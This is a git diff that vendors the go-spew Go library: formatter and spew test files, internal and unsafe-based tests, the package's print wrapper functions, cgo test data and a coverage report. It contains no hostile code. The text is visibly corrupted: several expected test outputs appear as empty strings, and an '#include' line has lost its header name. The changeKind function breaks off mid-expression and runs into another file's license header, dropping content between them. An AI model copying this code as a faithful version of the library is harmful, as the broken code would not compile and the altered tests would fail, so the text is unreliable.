"(*"+v3t+")"+v3s6) + addFormatterTest("%#v", &pv3, "(**"+v3t+")"+v3s6) + addFormatterTest("%#+v", v3, "("+v3t+")"+v3s7) + addFormatterTest("%#+v", pv3, "(*"+v3t+")("+v3Addr+")"+v3s8) + addFormatterTest("%#+v", &pv3, "(**"+v3t+")("+pv3Addr+"->"+v3Addr+")"+v3s8) +} + +func addPanicFormatterTests() { + // Type that panics in its Stringer interface. + v := panicer(127) + nv := (*panicer)(nil) + pv := &v + vAddr := fmt.Sprintf("%p", pv) + pvAddr := fmt.Sprintf("%p", &pv) + vt := "spew_test.panicer" + vs := "(PANIC=test panic)127" + addFormatterTest("%v", v, vs) + addFormatterTest("%v", pv, "<*>"+vs) + addFormatterTest("%v", &pv, "<**>"+vs) + addFormatterTest("%v", nv, "") + addFormatterTest("%+v", v, vs) + addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs) + addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs) + addFormatterTest("%+v", nv, "") + addFormatterTest("%#v", v, "("+vt+")"+vs) + addFormatterTest("%#v", pv, "(*"+vt+")"+vs) + addFormatterTest("%#v", &pv, "(**"+vt+")"+vs) + addFormatterTest("%#v", nv, "(*"+vt+")"+"") + addFormatterTest("%#+v", v, "("+vt+")"+vs) + addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs) + addFormatterTest("%#+v", &pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs) + addFormatterTest("%#+v", nv, "(*"+vt+")"+"") +} + +func addErrorFormatterTests() { + // Type that has a custom Error interface. + v := customError(127) + nv := (*customError)(nil) + pv := &v + vAddr := fmt.Sprintf("%p", pv) + pvAddr := fmt.Sprintf("%p", &pv) + vt := "spew_test.customError" + vs := "error: 127" + addFormatterTest("%v", v, vs) + addFormatterTest("%v", pv, "<*>"+vs) + addFormatterTest("%v", &pv, "<**>"+vs) + addFormatterTest("%v", nv, "") + addFormatterTest("%+v", v, vs) + addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs) + addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs) + addFormatterTest("%+v", nv, "") + addFormatterTest("%#v", v, "("+vt+")"+vs) + addFormatterTest("%#v", pv, "(*"+vt+")"+vs) + addFormatterTest("%#v", &pv, "(**"+vt+")"+vs) + addFormatterTest("%#v", nv, "(*"+vt+")"+"") + addFormatterTest("%#+v", v, "("+vt+")"+vs) + addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs) + addFormatterTest("%#+v", &pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs) + addFormatterTest("%#+v", nv, "(*"+vt+")"+"") +} + +func addPassthroughFormatterTests() { + // %x passthrough with uint. + v := uint(4294967295) + pv := &v + vAddr := fmt.Sprintf("%x", pv) + pvAddr := fmt.Sprintf("%x", &pv) + vs := "ffffffff" + addFormatterTest("%x", v, vs) + addFormatterTest("%x", pv, vAddr) + addFormatterTest("%x", &pv, pvAddr) + + // %#x passthrough with uint. + v2 := int(2147483647) + pv2 := &v2 + v2Addr := fmt.Sprintf("%#x", pv2) + pv2Addr := fmt.Sprintf("%#x", &pv2) + v2s := "0x7fffffff" + addFormatterTest("%#x", v2, v2s) + addFormatterTest("%#x", pv2, v2Addr) + addFormatterTest("%#x", &pv2, pv2Addr) + + // %f passthrough with precision. + addFormatterTest("%.2f", 3.1415, "3.14") + addFormatterTest("%.3f", 3.1415, "3.142") + addFormatterTest("%.4f", 3.1415, "3.1415") + + // %f passthrough with width and precision. + addFormatterTest("%5.2f", 3.1415, " 3.14") + addFormatterTest("%6.3f", 3.1415, " 3.142") + addFormatterTest("%7.4f", 3.1415, " 3.1415") + + // %d passthrough with width. + addFormatterTest("%3d", 127, "127") + addFormatterTest("%4d", 127, " 127") + addFormatterTest("%5d", 127, " 127") + + // %q passthrough with string. + addFormatterTest("%q", "test", "\"test\"") +} + +// TestFormatter executes all of the tests described by formatterTests. +func TestFormatter(t *testing.T) { + // Setup tests. + addIntFormatterTests() + addUintFormatterTests() + addBoolFormatterTests() + addFloatFormatterTests() + addComplexFormatterTests() + addArrayFormatterTests() + addSliceFormatterTests() + addStringFormatterTests() + addInterfaceFormatterTests() + addMapFormatterTests() + addStructFormatterTests() + addUintptrFormatterTests() + addUnsafePointerFormatterTests() + addChanFormatterTests() + addFuncFormatterTests() + addCircularFormatterTests() + addPanicFormatterTests() + addErrorFormatterTests() + addPassthroughFormatterTests() + + t.Logf("Running %d tests", len(formatterTests)) + for i, test := range formatterTests { + buf := new(bytes.Buffer) + spew.Fprintf(buf, test.format, test.in) + s := buf.String() + if testFailed(s, test.wants) { + t.Errorf("Formatter #%d format: %s got: %s %s", i, test.format, s, + stringizeWants(test.wants)) + continue + } + } +} + +type testStruct struct { + x int +} + +func (ts testStruct) String() string { + return fmt.Sprintf("ts.%d", ts.x) +} + +type testStructP struct { + x int +} + +func (ts *testStructP) String() string { + return fmt.Sprintf("ts.%d", ts.x) +} + +func TestPrintSortedKeys(t *testing.T) { + cfg := spew.ConfigState{SortKeys: true} + s := cfg.Sprint(map[int]string{1: "1", 3: "3", 2: "2"}) + expected := "map[1:1 2:2 3:3]" + if s != expected { + t.Errorf("Sorted keys mismatch 1:\n %v %v", s, expected) + } + + s = cfg.Sprint(map[stringer]int{"1": 1, "3": 3, "2": 2}) + expected = "map[stringer 1:1 stringer 2:2 stringer 3:3]" + if s != expected { + t.Errorf("Sorted keys mismatch 2:\n %v %v", s, expected) + } + + s = cfg.Sprint(map[pstringer]int{pstringer("1"): 1, pstringer("3"): 3, pstringer("2"): 2}) + expected = "map[stringer 1:1 stringer 2:2 stringer 3:3]" + if spew.UnsafeDisabled { + expected = "map[1:1 2:2 3:3]" + } + if s != expected { + t.Errorf("Sorted keys mismatch 3:\n %v %v", s, expected) + } + + s = cfg.Sprint(map[testStruct]int{testStruct{1}: 1, testStruct{3}: 3, testStruct{2}: 2}) + expected = "map[ts.1:1 ts.2:2 ts.3:3]" + if s != expected { + t.Errorf("Sorted keys mismatch 4:\n %v %v", s, expected) + } + + if !spew.UnsafeDisabled { + s = cfg.Sprint(map[testStructP]int{testStructP{1}: 1, testStructP{3}: 3, testStructP{2}: 2}) + expected = "map[ts.1:1 ts.2:2 ts.3:3]" + if s != expected { + t.Errorf("Sorted keys mismatch 5:\n %v %v", s, expected) + } + } + + s = cfg.Sprint(map[customError]int{customError(1): 1, customError(3): 3, customError(2): 2}) + expected = "map[error: 1:1 error: 2:2 error: 3:3]" + if s != expected { + t.Errorf("Sorted keys mismatch 6:\n %v %v", s, expected) + } +} diff --git a/vendor/github.com/davecgh/go-spew/spew/internal_test.go b/vendor/github.com/davecgh/go-spew/spew/internal_test.go new file mode 100644 index 0000000000..20a9cfefc6 --- /dev/null +++ b/vendor/github.com/davecgh/go-spew/spew/internal_test.go @@ -0,0 +1,87 @@ +/* + * Copyright (c) 2013-2016 Dave Collins + * + * Permission to use, copy, modify, and distribute this software for any + * purpose with or without fee is hereby granted, provided that the above + * copyright notice and this permission notice appear in all copies. + * + * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES + * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF + * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR + * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES + * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN + * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF + * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. + */ + +/* +This test file is part of the spew package rather than than the spew_test +package because it needs access to internals to properly test certain cases +which are not possible via the public interface since they should never happen. +*/ + +package spew + +import ( + "bytes" + "reflect" + "testing" +) + +// dummyFmtState implements a fake fmt.State to use for testing invalid +// reflect.Value handling. This is necessary because the fmt package catches +// invalid values before invoking the formatter on them. +type dummyFmtState struct { + bytes.Buffer +} + +func (dfs *dummyFmtState) Flag(f int) bool { + if f == int('+') { + return true + } + return false +} + +func (dfs *dummyFmtState) Precision() (int, bool) { + return 0, false +} + +func (dfs *dummyFmtState) Width() (int, bool) { + return 0, false +} + +// TestInvalidReflectValue ensures the dump and formatter code handles an +// invalid reflect value properly. This needs access to internal state since it +// should never happen in real code and therefore can't be tested via the public +// API. +func TestInvalidReflectValue(t *testing.T) { + i := 1 + + // Dump invalid reflect value. + v := new(reflect.Value) + buf := new(bytes.Buffer) + d := dumpState{w: buf, cs: &Config} + d.dump(*v) + s := buf.String() + want := "" + if s != want { + t.Errorf("InvalidReflectValue #%d\n got: %s want: %s", i, s, want) + } + i++ + + // Formatter invalid reflect value. + buf2 := new(dummyFmtState) + f := formatState{value: *v, cs: &Config, fs: buf2} + f.format(*v) + s = buf2.String() + want = "" + if s != want { + t.Errorf("InvalidReflectValue #%d got: %s want: %s", i, s, want) + } +} + +// SortValues makes the internal sortValues function available to the test +// package. +func SortValues(values []reflect.Value, cs *ConfigState) { + sortValues(values, cs) +} diff --git a/vendor/github.com/davecgh/go-spew/spew/internalunsafe_test.go b/vendor/github.com/davecgh/go-spew/spew/internalunsafe_test.go new file mode 100644 index 0000000000..a0c612ec3d --- /dev/null +++ b/vendor/github.com/davecgh/go-spew/spew/internalunsafe_test.go @@ -0,0 +1,102 @@ +// Copyright (c) 2013-2016 Dave Collins + +// Permission to use, copy, modify, and distribute this software for any +// purpose with or without fee is hereby granted, provided that the above +// copyright notice and this permission notice appear in all copies. + +// THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES +// WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF +// MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR +// ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES +// WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN +// ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF +// OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. + +// NOTE: Due to the following build constraints, this file will only be compiled +// when the code is not running on Google App Engine, compiled by GopherJS, and +// "-tags safe" is not added to the go build command line. The "disableunsafe" +// tag is deprecated and thus should not be used. +// +build !js,!appengine,!safe,!disableunsafe + +/* +This test file is part of the spew package rather than than the spew_test +package because it needs access to internals to properly test certain cases +which are not possible via the public interface since they should never happen. +*/ + +package spew + +import ( + "bytes" + "reflect" + "testing" + "unsafe" +) + +// changeKind uses unsafe to intentionally change the kind of a reflect.Value to +// the maximum kind value which does not exist. This is needed to test the +// fallback code which punts to the standard fmt library for new types that +// might get added to the language. +func changeKind(v *reflect.Value, readOnly bool) { + rvf := (*uintptr)(unsafe.Pointer(uintptr(unsafe.Pointer(v)) + offsetFlag)) + *rvf = *rvf | ((1< + * + * Permission to use, copy, modify, and distribute this software for any + * purpose with or without fee is hereby granted, provided that the above + * copyright notice and this permission notice appear in all copies. + * + * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES + * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF + * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR + * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES + * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN + * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF + * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. + */ + +package spew + +import ( + "fmt" + "io" +) + +// Errorf is a wrapper for fmt.Errorf that treats each argument as if it were +// passed with a default Formatter interface returned by NewFormatter. It +// returns the formatted string as a value that satisfies error. See +// NewFormatter for formatting details. +// +// This function is shorthand for the following syntax: +// +// fmt.Errorf(format, spew.NewFormatter(a), spew.NewFormatter(b)) +func Errorf(format string, a ...interface{}) (err error) { + return fmt.Errorf(format, convertArgs(a)...) +} + +// Fprint is a wrapper for fmt.Fprint that treats each argument as if it were +// passed with a default Formatter interface returned by NewFormatter. It +// returns the number of bytes written and any write error encountered. See +// NewFormatter for formatting details. +// +// This function is shorthand for the following syntax: +// +// fmt.Fprint(w, spew.NewFormatter(a), spew.NewFormatter(b)) +func Fprint(w io.Writer, a ...interface{}) (n int, err error) { + return fmt.Fprint(w, convertArgs(a)...) +} + +// Fprintf is a wrapper for fmt.Fprintf that treats each argument as if it were +// passed with a default Formatter interface returned by NewFormatter. It +// returns the number of bytes written and any write error encountered. See +// NewFormatter for formatting details. +// +// This function is shorthand for the following syntax: +// +// fmt.Fprintf(w, format, spew.NewFormatter(a), spew.NewFormatter(b)) +func Fprintf(w io.Writer, format string, a ...interface{}) (n int, err error) { + return fmt.Fprintf(w, format, convertArgs(a)...) +} + +// Fprintln is a wrapper for fmt.Fprintln that treats each argument as if it +// passed with a default Formatter interface returned by NewFormatter. See +// NewFormatter for formatting details. +// +// This function is shorthand for the following syntax: +// +// fmt.Fprintln(w, spew.NewFormatter(a), spew.NewFormatter(b)) +func Fprintln(w io.Writer, a ...interface{}) (n int, err error) { + return fmt.Fprintln(w, convertArgs(a)...) +} + +// Print is a wrapper for fmt.Print that treats each argument as if it were +// passed with a default Formatter interface returned by NewFormatter. It +// returns the number of bytes written and any write error encountered. See +// NewFormatter for formatting details. +// +// This function is shorthand for the following syntax: +// +// fmt.Print(spew.NewFormatter(a), spew.NewFormatter(b)) +func Print(a ...interface{}) (n int, err error) { + return fmt.Print(convertArgs(a)...) +} + +// Printf is a wrapper for fmt.Printf that treats each argument as if it were +// passed with a default Formatter interface returned by NewFormatter. It +// returns the number of bytes written and any write error encountered. See +// NewFormatter for formatting details. +// +// This function is shorthand for the following syntax: +// +// fmt.Printf(format, spew.NewFormatter(a), spew.NewFormatter(b)) +func Printf(format string, a ...interface{}) (n int, err error) { + return fmt.Printf(format, convertArgs(a)...) +} + +// Println is a wrapper for fmt.Println that treats each argument as if it were +// passed with a default Formatter interface returned by NewFormatter. It +// returns the number of bytes written and any write error encountered. See +// NewFormatter for formatting details. +// +// This function is shorthand for the following syntax: +// +// fmt.Println(spew.NewFormatter(a), spew.NewFormatter(b)) +func Println(a ...interface{}) (n int, err error) { + return fmt.Println(convertArgs(a)...) +} + +// Sprint is a wrapper for fmt.Sprint that treats each argument as if it were +// passed with a default Formatter interface returned by NewFormatter. It +// returns the resulting string. See NewFormatter for formatting details. +// +// This function is shorthand for the following syntax: +// +// fmt.Sprint(spew.NewFormatter(a), spew.NewFormatter(b)) +func Sprint(a ...interface{}) string { + return fmt.Sprint(convertArgs(a)...) +} + +// Sprintf is a wrapper for fmt.Sprintf that treats each argument as if it were +// passed with a default Formatter interface returned by NewFormatter. It +// returns the resulting string. See NewFormatter for formatting details. +// +// This function is shorthand for the following syntax: +// +// fmt.Sprintf(format, spew.NewFormatter(a), spew.NewFormatter(b)) +func Sprintf(format string, a ...interface{}) string { + return fmt.Sprintf(format, convertArgs(a)...) +} + +// Sprintln is a wrapper for fmt.Sprintln that treats each argument as if it +// were passed with a default Formatter interface returned by NewFormatter. It +// returns the resulting string. See NewFormatter for formatting details. +// +// This function is shorthand for the following syntax: +// +// fmt.Sprintln(spew.NewFormatter(a), spew.NewFormatter(b)) +func Sprintln(a ...interface{}) string { + return fmt.Sprintln(convertArgs(a)...) +} + +// convertArgs accepts a slice of arguments and returns a slice of the same +// length with each argument converted to a default spew Formatter interface. +func convertArgs(args []interface{}) (formatters []interface{}) { + formatters = make([]interface{}, len(args)) + for index, arg := range args { + formatters[index] = NewFormatter(arg) + } + return formatters +} diff --git a/vendor/github.com/davecgh/go-spew/spew/spew_test.go b/vendor/github.com/davecgh/go-spew/spew/spew_test.go new file mode 100644 index 0000000000..b70466c69f --- /dev/null +++ b/vendor/github.com/davecgh/go-spew/spew/spew_test.go @@ -0,0 +1,320 @@ +/* + * Copyright (c) 2013-2016 Dave Collins + * + * Permission to use, copy, modify, and distribute this software for any + * purpose with or without fee is hereby granted, provided that the above + * copyright notice and this permission notice appear in all copies. + * + * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES + * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF + * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR + * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES + * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN + * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF + * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. + */ + +package spew_test + +import ( + "bytes" + "fmt" + "io/ioutil" + "os" + "testing" + + "github.com/davecgh/go-spew/spew" +) + +// spewFunc is used to identify which public function of the spew package or +// ConfigState a test applies to. +type spewFunc int + +const ( + fCSFdump spewFunc = iota + fCSFprint + fCSFprintf + fCSFprintln + fCSPrint + fCSPrintln + fCSSdump + fCSSprint + fCSSprintf + fCSSprintln + fCSErrorf + fCSNewFormatter + fErrorf + fFprint + fFprintln + fPrint + fPrintln + fSdump + fSprint + fSprintf + fSprintln +) + +// Map of spewFunc values to names for pretty printing. +var spewFuncStrings = map[spewFunc]string{ + fCSFdump: "ConfigState.Fdump", + fCSFprint: "ConfigState.Fprint", + fCSFprintf: "ConfigState.Fprintf", + fCSFprintln: "ConfigState.Fprintln", + fCSSdump: "ConfigState.Sdump", + fCSPrint: "ConfigState.Print", + fCSPrintln: "ConfigState.Println", + fCSSprint: "ConfigState.Sprint", + fCSSprintf: "ConfigState.Sprintf", + fCSSprintln: "ConfigState.Sprintln", + fCSErrorf: "ConfigState.Errorf", + fCSNewFormatter: "ConfigState.NewFormatter", + fErrorf: "spew.Errorf", + fFprint: "spew.Fprint", + fFprintln: "spew.Fprintln", + fPrint: "spew.Print", + fPrintln: "spew.Println", + fSdump: "spew.Sdump", + fSprint: "spew.Sprint", + fSprintf: "spew.Sprintf", + fSprintln: "spew.Sprintln", +} + +func (f spewFunc) String() string { + if s, ok := spewFuncStrings[f]; ok { + return s + } + return fmt.Sprintf("Unknown spewFunc (%d)", int(f)) +} + +// spewTest is used to describe a test to be performed against the public +// functions of the spew package or ConfigState. +type spewTest struct { + cs *spew.ConfigState + f spewFunc + format string + in interface{} + want string +} + +// spewTests houses the tests to be performed against the public functions of +// the spew package and ConfigState. +// +// These tests are only intended to ensure the public functions are exercised +// and are intentionally not exhaustive of types. The exhaustive type +// tests are handled in the dump and format tests. +var spewTests []spewTest + +// redirStdout is a helper function to return the standard output from f as a +// byte slice. +func redirStdout(f func()) ([]byte, error) { + tempFile, err := ioutil.TempFile("", "ss-test") + if err != nil { + return nil, err + } + fileName := tempFile.Name() + defer os.Remove(fileName) // Ignore error + + origStdout := os.Stdout + os.Stdout = tempFile + f() + os.Stdout = origStdout + tempFile.Close() + + return ioutil.ReadFile(fileName) +} + +func initSpewTests() { + // Config states with various settings. + scsDefault := spew.NewDefaultConfig() + scsNoMethods := &spew.ConfigState{Indent: " ", DisableMethods: true} + scsNoPmethods := &spew.ConfigState{Indent: " ", DisablePointerMethods: true} + scsMaxDepth := &spew.ConfigState{Indent: " ", MaxDepth: 1} + scsContinue := &spew.ConfigState{Indent: " ", ContinueOnMethod: true} + scsNoPtrAddr := &spew.ConfigState{DisablePointerAddresses: true} + scsNoCap := &spew.ConfigState{DisableCapacities: true} + + // Variables for tests on types which implement Stringer interface with and + // without a pointer receiver. + ts := stringer("test") + tps := pstringer("test") + + type ptrTester struct { + s *struct{} + } + tptr := &ptrTester{s: &struct{}{}} + + // depthTester is used to test max depth handling for structs, array, slices + // and maps. + type depthTester struct { + ic indirCir1 + arr [1]string + slice []string + m map[string]int + } + dt := depthTester{indirCir1{nil}, [1]string{"arr"}, []string{"slice"}, + map[string]int{"one": 1}} + + // Variable for tests on types which implement error interface. + te := customError(10) + + spewTests = []spewTest{ + {scsDefault, fCSFdump, "", int8(127), "(int8) 127\n"}, + {scsDefault, fCSFprint, "", int16(32767), "32767"}, + {scsDefault, fCSFprintf, "%v", int32(2147483647), "2147483647"}, + {scsDefault, fCSFprintln, "", int(2147483647), "2147483647\n"}, + {scsDefault, fCSPrint, "", int64(9223372036854775807), "9223372036854775807"}, + {scsDefault, fCSPrintln, "", uint8(255), "255\n"}, + {scsDefault, fCSSdump, "", uint8(64), "(uint8) 64\n"}, + {scsDefault, fCSSprint, "", complex(1, 2), "(1+2i)"}, + {scsDefault, fCSSprintf, "%v", complex(float32(3), 4), "(3+4i)"}, + {scsDefault, fCSSprintln, "", complex(float64(5), 6), "(5+6i)\n"}, + {scsDefault, fCSErrorf, "%#v", uint16(65535), "(uint16)65535"}, + {scsDefault, fCSNewFormatter, "%v", uint32(4294967295), "4294967295"}, + {scsDefault, fErrorf, "%v", uint64(18446744073709551615), "18446744073709551615"}, + {scsDefault, fFprint, "", float32(3.14), "3.14"}, + {scsDefault, fFprintln, "", float64(6.28), "6.28\n"}, + {scsDefault, fPrint, "", true, "true"}, + {scsDefault, fPrintln, "", false, "false\n"}, + {scsDefault, fSdump, "", complex(-10, -20), "(complex128) (-10-20i)\n"}, + {scsDefault, fSprint, "", complex(-1, -2), "(-1-2i)"}, + {scsDefault, fSprintf, "%v", complex(float32(-3), -4), "(-3-4i)"}, + {scsDefault, fSprintln, "", complex(float64(-5), -6), "(-5-6i)\n"}, + {scsNoMethods, fCSFprint, "", ts, "test"}, + {scsNoMethods, fCSFprint, "", &ts, "<*>test"}, + {scsNoMethods, fCSFprint, "", tps, "test"}, + {scsNoMethods, fCSFprint, "", &tps, "<*>test"}, + {scsNoPmethods, fCSFprint, "", ts, "stringer test"}, + {scsNoPmethods, fCSFprint, "", &ts, "<*>stringer test"}, + {scsNoPmethods, fCSFprint, "", tps, "test"}, + {scsNoPmethods, fCSFprint, "", &tps, "<*>stringer test"}, + {scsMaxDepth, fCSFprint, "", dt, "{{} [] [] map[]}"}, + {scsMaxDepth, fCSFdump, "", dt, "(spew_test.depthTester) {\n" + + " ic: (spew_test.indirCir1) {\n \n },\n" + + " arr: ([1]string) (len=1 cap=1) {\n \n },\n" + + " slice: ([]string) (len=1 cap=1) {\n \n },\n" + + " m: (map[string]int) (len=1) {\n \n }\n}\n"}, + {scsContinue, fCSFprint, "", ts, "(stringer test) test"}, + {scsContinue, fCSFdump, "", ts, "(spew_test.stringer) " + + "(len=4) (stringer test) \"test\"\n"}, + {scsContinue, fCSFprint, "", te, "(error: 10) 10"}, + {scsContinue, fCSFdump, "", te, "(spew_test.customError) " + + "(error: 10) 10\n"}, + {scsNoPtrAddr, fCSFprint, "", tptr, "<*>{<*>{}}"}, + {scsNoPtrAddr, fCSSdump, "", tptr, "(*spew_test.ptrTester)({\ns: (*struct {})({\n})\n})\n"}, + {scsNoCap, fCSSdump, "", make([]string, 0, 10), "([]string) {\n}\n"}, + {scsNoCap, fCSSdump, "", make([]string, 1, 10), "([]string) (len=1) {\n(string) \"\"\n}\n"}, + } +} + +// TestSpew executes all of the tests described by spewTests. +func TestSpew(t *testing.T) { + initSpewTests() + + t.Logf("Running %d tests", len(spewTests)) + for i, test := range spewTests { + buf := new(bytes.Buffer) + switch test.f { + case fCSFdump: + test.cs.Fdump(buf, test.in) + + case fCSFprint: + test.cs.Fprint(buf, test.in) + + case fCSFprintf: + test.cs.Fprintf(buf, test.format, test.in) + + case fCSFprintln: + test.cs.Fprintln(buf, test.in) + + case fCSPrint: + b, err := redirStdout(func() { test.cs.Print(test.in) }) + if err != nil { + t.Errorf("%v #%d %v", test.f, i, err) + continue + } + buf.Write(b) + + case fCSPrintln: + b, err := redirStdout(func() { test.cs.Println(test.in) }) + if err != nil { + t.Errorf("%v #%d %v", test.f, i, err) + continue + } + buf.Write(b) + + case fCSSdump: + str := test.cs.Sdump(test.in) + buf.WriteString(str) + + case fCSSprint: + str := test.cs.Sprint(test.in) + buf.WriteString(str) + + case fCSSprintf: + str := test.cs.Sprintf(test.format, test.in) + buf.WriteString(str) + + case fCSSprintln: + str := test.cs.Sprintln(test.in) + buf.WriteString(str) + + case fCSErrorf: + err := test.cs.Errorf(test.format, test.in) + buf.WriteString(err.Error()) + + case fCSNewFormatter: + fmt.Fprintf(buf, test.format, test.cs.NewFormatter(test.in)) + + case fErrorf: + err := spew.Errorf(test.format, test.in) + buf.WriteString(err.Error()) + + case fFprint: + spew.Fprint(buf, test.in) + + case fFprintln: + spew.Fprintln(buf, test.in) + + case fPrint: + b, err := redirStdout(func() { spew.Print(test.in) }) + if err != nil { + t.Errorf("%v #%d %v", test.f, i, err) + continue + } + buf.Write(b) + + case fPrintln: + b, err := redirStdout(func() { spew.Println(test.in) }) + if err != nil { + t.Errorf("%v #%d %v", test.f, i, err) + continue + } + buf.Write(b) + + case fSdump: + str := spew.Sdump(test.in) + buf.WriteString(str) + + case fSprint: + str := spew.Sprint(test.in) + buf.WriteString(str) + + case fSprintf: + str := spew.Sprintf(test.format, test.in) + buf.WriteString(str) + + case fSprintln: + str := spew.Sprintln(test.in) + buf.WriteString(str) + + default: + t.Errorf("%v #%d unrecognized function", test.f, i) + continue + } + s := buf.String() + if test.want != s { + t.Errorf("ConfigState #%d\n got: %s want: %s", i, s, test.want) + continue + } + } +} diff --git a/vendor/github.com/davecgh/go-spew/spew/testdata/dumpcgo.go b/vendor/github.com/davecgh/go-spew/spew/testdata/dumpcgo.go new file mode 100644 index 0000000000..5c87dd456e --- /dev/null +++ b/vendor/github.com/davecgh/go-spew/spew/testdata/dumpcgo.go @@ -0,0 +1,82 @@ +// Copyright (c) 2013 Dave Collins +// +// Permission to use, copy, modify, and distribute this software for any +// purpose with or without fee is hereby granted, provided that the above +// copyright notice and this permission notice appear in all copies. +// +// THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES +// WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF +// MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR +// ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES +// WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN +// ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF +// OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. + +// NOTE: Due to the following build constraints, this file will only be compiled +// when both cgo is supported and "-tags testcgo" is added to the go test +// command line. This code should really only be in the dumpcgo_test.go file, +// but unfortunately Go will not allow cgo in test files, so this is a +// workaround to allow cgo types to be tested. This configuration is used +// because spew itself does not require cgo to run even though it does handle +// certain cgo types specially. Rather than forcing all clients to require cgo +// and an external C compiler just to run the tests, this scheme makes them +// optional. +// +build cgo,testcgo + +package testdata + +/* +#include +typedef unsigned char custom_uchar_t; + +char *ncp = 0; +char *cp = "test"; +char ca[6] = {'t', 'e', 's', 't', '2', '\0'}; +unsigned char uca[6] = {'t', 'e', 's', 't', '3', '\0'}; +signed char sca[6] = {'t', 'e', 's', 't', '4', '\0'}; +uint8_t ui8ta[6] = {'t', 'e', 's', 't', '5', '\0'}; +custom_uchar_t tuca[6] = {'t', 'e', 's', 't', '6', '\0'}; +*/ +import "C" + +// GetCgoNullCharPointer returns a null char pointer via cgo. This is only +// used for tests. +func GetCgoNullCharPointer() interface{} { + return C.ncp +} + +// GetCgoCharPointer returns a char pointer via cgo. This is only used for +// tests. +func GetCgoCharPointer() interface{} { + return C.cp +} + +// GetCgoCharArray returns a char array via cgo and the array's len and cap. +// This is only used for tests. +func GetCgoCharArray() (interface{}, int, int) { + return C.ca, len(C.ca), cap(C.ca) +} + +// GetCgoUnsignedCharArray returns an unsigned char array via cgo and the +// array's len and cap. This is only used for tests. +func GetCgoUnsignedCharArray() (interface{}, int, int) { + return C.uca, len(C.uca), cap(C.uca) +} + +// GetCgoSignedCharArray returns a signed char array via cgo and the array's len +// and cap. This is only used for tests. +func GetCgoSignedCharArray() (interface{}, int, int) { + return C.sca, len(C.sca), cap(C.sca) +} + +// GetCgoUint8tArray returns a uint8_t array via cgo and the array's len and +// cap. This is only used for tests. +func GetCgoUint8tArray() (interface{}, int, int) { + return C.ui8ta, len(C.ui8ta), cap(C.ui8ta) +} + +// GetCgoTypdefedUnsignedCharArray returns a typedefed unsigned char array via +// cgo and the array's len and cap. This is only used for tests. +func GetCgoTypdefedUnsignedCharArray() (interface{}, int, int) { + return C.tuca, len(C.tuca), cap(C.tuca) +} diff --git a/vendor/github.com/davecgh/go-spew/test_coverage.txt b/vendor/github.com/davecgh/go-spew/test_coverage.txt new file mode 100644 index 0000000000..2cd087a2a1 --- /dev/null +++ b/vendor/github.com/davecgh/go-spew/test_coverage.txt @@ -0,0 +1,61 @@ + +github.com/davecgh/go-spew/spew/dump.go dumpState.dump 100.00% (88/88) +github.com/davecgh/go-spew/spew/format.go formatState.format 100.00% (82/82) +github.com/davecgh/go-spew/spew/format.go formatState.formatPtr 100.00% (52/52) +github.com/davecgh/go-spew/spew/dump.go dumpState.dumpPtr 100.00% (44/44) 